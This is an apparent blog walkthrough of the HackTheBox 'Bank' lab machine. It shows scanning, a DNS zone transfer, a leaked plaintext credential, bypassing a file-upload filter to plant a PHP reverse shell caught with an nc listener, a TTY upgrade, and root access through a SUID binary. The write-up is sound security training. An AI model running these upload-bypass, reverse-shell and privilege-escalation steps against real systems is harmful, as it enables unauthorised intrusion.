HackTheBox Bank Walkthrough

Network Enumeration

As usual, I started the initial enumeration by running a port scan using nmap looking for open ports and running services.

┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ nmap -sC -sV -oN nmap/initial 10.10.10.29
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-06 11:07 IST
Nmap scan report for 10.10.10.29 (10.10.10.29)
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.13 seconds

We have three different ports open. We have SSH running on port 22, DNS running on port 53 and Apache httpd web server running on port 80. Let's start the enumeration with port 53 first.

DNS - TCP/UDP 53

The nmap scan does not give us any hostname, so I guessed that it might be bank.htb and it works!

┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ dig axfr bank.htb @10.10.10.29

; <<>> DiG 9.18.1-1-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 156 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP)
;; WHEN: Mon Jul 11 16:52:40 IST 2022
;; XFR size: 6 records (messages 1, bytes 171)

I added all the hostnames to my /etc/hosts file.

┌──(madhav㉿kali)-[~/ctf/htb]
└─$ cat /etc/hosts     
127.0.0.1       localhost
127.0.1.1       kali
10.10.10.29     bank.htb chris.bank.htb ns.bank.htb www.bank.htb

Web Enumeration

When we visit the url http://10.10.10.29/ in our web browser, we get the default Apache installation page.

But If we visit http://bank.htb, we get a different website this time.

We have a website with a login form which runs on php. I tried logging in using some default credentials, but they didn't work. I also tried bypassing the login page using SQL Injection, but that also doesn't work.

Next I performed a gobuster scan to look for hidden files and directories.

┌──(madhav㉿kali)-[~/ctf/htb]
└─$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://bank.htb 
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 302) [Size: 7322] [--> login.php]
/support.php          (Status: 302) [Size: 3291] [--> login.php]
/login.php            (Status: 200) [Size: 1974]                
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/] 
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]    
/server-status        (Status: 403) [Size: 288]
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]

===============================================================
Finished
===============================================================

We got many files and directories, but we cannot access most of them because it redirects us back to the login page. But we have a directory named /balance-transfer which is also accessible to unauthenticated users.

The /balance-transfer directory contains many .acc extension files which contain encrypted usernames and passwords. One of the file has an oddly different size and it contains the username and password in plain text.

┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ cat 68576f20e9732f1b2edc4df5b8533230.acc 
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

We can now use these credentials to login into the website. After logging in, we are given a dashboard.

Shell as www-data

In the Support section, we have an option to create a new support ticket where we can also upload files. But when we try uploading a php reverse shell, it gives us an error that php files are not allowed.

I checked the source code of the website, I found out a comment which says:

It means that we can upload .php files by just changing the extension to .htb I will be using the reverse shell by pentestmonkey.

This time the reverse shell was uploaded successfully. Now we can simply execute it from the attachment section.

After executing the shell, we will get a reverse shell back into our system.

┌──(madhav㉿kali)-[~/ctf/htb/bank]
└─$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 49072
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 16:59:44 up  7:28,  0 users,  load average: 0.00, 0.06, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next I upgraded this dumb shell to a fully interactive TTY using the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
reset
export TERM=xterm
stty rows 48 columns 179

Now that we have a fully interactive shell, we can read our user flag present in the home directory of user chris.

www-data@bank:/$ cat /home/chris/user.txt
2dca09f*************************

Root Shell

I checked for the files with SUID capabilities and got an unusual binary.

find / -type f -perm -u=s 2>/dev/null

We have a file named emergency located in the /var/htb/bin directory. First I ran the file command to check its file type.

www-data@bank:/$ file /var/htb/bin/emergency 
/var/htb/bin/emergency: setuid ELF 32-bit LSB  shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped

It is a 32-bit executable file. I tried running this binary and it directly gave us the root shell!

www-data@bank:/$ ./var/htb/bin/emergency 
# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
root

We have a root shell and now we can read our final flag present in the /root directory.

# cat /root/root.txt
83a3cee*************************

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Odom Sok.